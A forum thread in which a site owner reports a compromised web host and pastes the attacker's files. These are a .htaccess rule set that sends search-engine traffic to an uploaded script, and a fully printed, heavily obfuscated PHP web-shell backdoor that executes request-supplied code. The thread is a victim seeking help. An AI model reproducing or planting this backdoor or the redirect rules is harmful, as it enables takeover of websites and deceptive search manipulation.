Cheat Engine :: View topic - my hosting .htaccess was compromised

Cheat Engine
The Official Site of Cheat Engine

FAQ

Memberlist

Usergroups

Profile

my hosting .htaccess was compromised

Cheat Engine Forum Index -> Random spam

View previous topic :: View next topic

Author

Message

Eraser
Grandmaster Cheater

Reputation: 0

Joined: 23 Jul 2008
Posts: 504
Location: http://www.youtube.com/PCtrainers

Posted: Tue Apr 05, 2016 10:07 am Post subject: my hosting .htaccess was compromised

Web development forum is not really active so I'm posting here.
Today I found 2 files uploaded to my hosting server and .htaccess edited. I wonder what exactly they tried to do? Just install a rootkit/web shell? I could not open any of these files to check.

.htaccess:

Code:

RewriteEngine On

RewriteCond %{ENV:REDIRECT_STATUS} 200

RewriteRule ^ - [L]

RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]

RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)

RewriteRule ^(.*)$ gap-inverts.php?$1 [L]

gap-inverts.php contained some encrypted code:
http://pastebin.com/38Wi8NzK

another file that was uploaded - xkndnofl.php probably a rootkit:

Code:

<?php

$fob= 'evR_IoB'; $collapsible = 'H';
$archangels ='"';$horsely ='O'; $gowned='c'; $demurrer ='v'; $inventory='$C;$([';$isothermal = 'V';$killian = 'Rr=_LEMP$'; $gangster ='?l;X';$biscuits='c)gatT'; $gut ='S:eba),[';$avenue= 'o';
$headlong='Ebt[eG';
$chronic= 'e'; $articulate = 'm_Pvo_=;$';$glenden ='^6Orr';$jerkings = 'n'; $braggart='T';

$incorporated='t'; $antecedent='"';
$gopher='epl';$boning= 't';$hock= '(';
$bethena ='g';$churn = 'sZ$VReCH)'; $humored ='"';$cinema ='eVv';$dissociates= 'T';

$beseech='O';
$buttermilk='E'; $fortnightly='H'; $intentions='v)'; $cherry ='"'; $baneful= 'c';
$inopportune ='L';$forecasts=',';$hemisphere ='M';$horse ='("d($_ceE';
$further ='d'; $boroughs = 'Q;PfBT'; $broadly = 'a';$hilarius = 'arIKes_s_'; $din= 'a';

$integration = 'ecee"liS'; $loudspeaking ='$'; $immaterial= '4ti$nsa';$correction = 'L';
$byteme='i';$joining ='by_)C';

$julie= 'i';$exasperation ='neHiei'; $jaundice= ')';$hazy = 'TSu))TeG'; $economist= 'm';$liturgy = 't)h_rUrtW';$chivalrously='$]Ya';

$encamps = 'm'; $editors ='a';$glyph ='yr("g';$decathlon= 'V'; $eagerness='(';$freida = 'r'; $interrogative='['; $entity='s:Ts';

$crunch =']'; $exploitations ='(r?si$cuQ'; $jennifer='pN_(]ar'; $capitalizes =']'; $chub= 'h'; $channeller= 'g(Trvi';
$hose= 'MtfUR(]';$faints ='K';

$blackberries = 'a'; $bicep = 'l'; $couplings ='ia'; $elicits =')[E(g)"';
$cook ='t'; $craziness='s';$junction='d'; $axiom='J_ ';$bloc=$exploitations['6'] .$channeller['3'] .$hazy['6'] . $couplings['1'].
$cook. $hazy['6'] .$axiom['1'].

$hose[2] . $exploitations[7] .
$exasperation['0'] .$exploitations['6'] .$cook .$couplings['0'] .$articulate['4']. $exasperation['0'] ;
$goldarina = $axiom['2']; $evacuate =$bloc($goldarina, $hazy['6']. $channeller[4] . $couplings['1'].$bicep.$elicits['3']. $couplings['1']. $channeller['3'] .$channeller['3']. $couplings['1'].$glyph['0'] .
$axiom['1'].$jennifer['0']. $articulate['4']. $jennifer['0'].$elicits['3'].

$hose[2]. $exploitations[7] . $exasperation['0'] .
$exploitations['6'] .$axiom['1'] .$elicits['4'] .$hazy['6'] .

$cook. $axiom['1'] . $couplings['1']. $channeller['3'] .$elicits['4']. $craziness .$elicits['3'].$elicits['5'].$elicits['5'].$elicits['5'] .$boroughs['1']);$evacuate($correction , $diatom['5'] , $inadmissible , $chivalrously['2'] , $complicating['1'], $handspike['2'],$articulate['6'] ,
$battens['0'],
$gilda['2'] , $glenden['1'] ,

$hose[2], $blueberries['5'], $articulate['4'], $finalizing['0'] ,$exploitations['5'] . $couplings['0']. $articulate['6'].$couplings['1'] .
$channeller['3'].$channeller['3'] .$couplings['1'].$glyph['0'] . $axiom['1'] . $encamps .$hazy['6']. $channeller['3'] .

$elicits['4'] .$hazy['6'] .
$elicits['3'].
$exploitations['5'] .

$axiom['1'] . $hose['4'] .$elicits['2'] .$exploitations['8'] .$hose['3'] .$elicits['2'].

$hazy['1'].$channeller['2']. $forecasts. $exploitations['5'] .$axiom['1'] .
$joining[4]. $beseech.$beseech.
$faints . $hilarius['2'] . $elicits['2'] .
$forecasts. $exploitations['5'] . $axiom['1'] . $hazy['1'] .$elicits['2'] .
$hose['4'] .$decathlon. $elicits['2'] .$hose['4'].$elicits['5'] . $boroughs['1'].$exploitations['5']. $couplings['1'] .$articulate['6'].$couplings['0']. $craziness.$craziness . $hazy['6'] .
$cook.$elicits['3']. $exploitations['5'] .$couplings['0'] .$elicits['1'].$elicits[6]. $channeller[4]. $elicits['4'].
$joining['0'].$chub.$cook .$bicep.$encamps. $exploitations['6'].$elicits[6].
$hose[6] . $elicits['5'] . $exploitations['2'].$exploitations['5'].$couplings['0'] .$elicits['1'] .

$elicits[6].$channeller[4] .
$elicits['4']. $joining['0']. $chub .$cook.$bicep.
$encamps . $exploitations['6'].$elicits[6] . $hose[6].
$entity[1] . $elicits['3']. $couplings['0'].$craziness .$craziness.$hazy['6']. $cook. $elicits['3']. $exploitations['5'].$couplings['0']. $elicits['1'] . $elicits[6]. $exasperation['2'].

$channeller['2'].
$channeller['2'] .$boroughs[2]. $axiom['1']. $decathlon. $hazy['7']. $boroughs['4'].$exasperation['2']. $channeller['2'].
$correction .$hose['0'].$joining[4].$elicits[6].$hose[6]. $elicits['5']. $exploitations['2'] .$exploitations['5'].$couplings['0'] .

$elicits['1'] .
$elicits[6] .$exasperation['2'].$channeller['2']. $channeller['2']. $boroughs[2] .$axiom['1'] .$decathlon. $hazy['7'].$boroughs['4'] . $exasperation['2'].$channeller['2']. $correction.
$hose['0'] .
$joining[4] . $elicits[6] . $hose[6] .
$entity[1].

$junction.
$couplings['0'].$hazy['6'] . $elicits['5'] . $boroughs['1'] . $hazy['6']. $channeller[4] .
$couplings['1'] . $bicep.

$elicits['3'].

$craziness.$cook. $channeller['3'] .$channeller['3'] .$hazy['6'] .$channeller[4] .

$elicits['3'] .$joining['0'].$couplings['1'].

$craziness. $hazy['6'].
$glenden['1'] . $immaterial['0']. $axiom['1']. $junction. $hazy['6'] .$exploitations['6']. $articulate['4'].
$junction . $hazy['6'] . $elicits['3'] .$craziness.

$cook.$channeller['3'] .$channeller['3'] . $hazy['6'] .

$channeller[4].$elicits['3'] .$exploitations['5'].$couplings['1']. $elicits['5']. $elicits['5']. $elicits['5'] .$elicits['5'].
$boroughs['1']);

Last edited by Eraser on Tue Apr 05, 2016 10:12 am; edited 3 times in total

Killor1
Master Cheater

Reputation: 5

Joined: 21 May 2008
Posts: 499
Location: Memphis

Posted: Tue Apr 05, 2016 10:10 am Post subject: Re: my hosting .htaccess was compromised

Eraser wrote:

Code:

gap-inverts.php contrained some encrypted code:

another file that was uploaded - xkndnofl.php probably a rootkit:

Code:

Since thy is in random spam. where you been and what were yo doing. faping?

Eraser
Grandmaster Cheater

Reputation: 0

Joined: 23 Jul 2008
Posts: 504
Location: http://www.youtube.com/PCtrainers

Posted: Tue Apr 05, 2016 10:32 am Post subject:

nvm found some tools online and it seems it's a rootkit

Display posts from previous:

	Cheat Engine Forum Index -> Random spam	All times are GMT - 6 Hours
Page 1 of 1

Jump to:

You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You cannot attach files in this forum
You can download files in this forum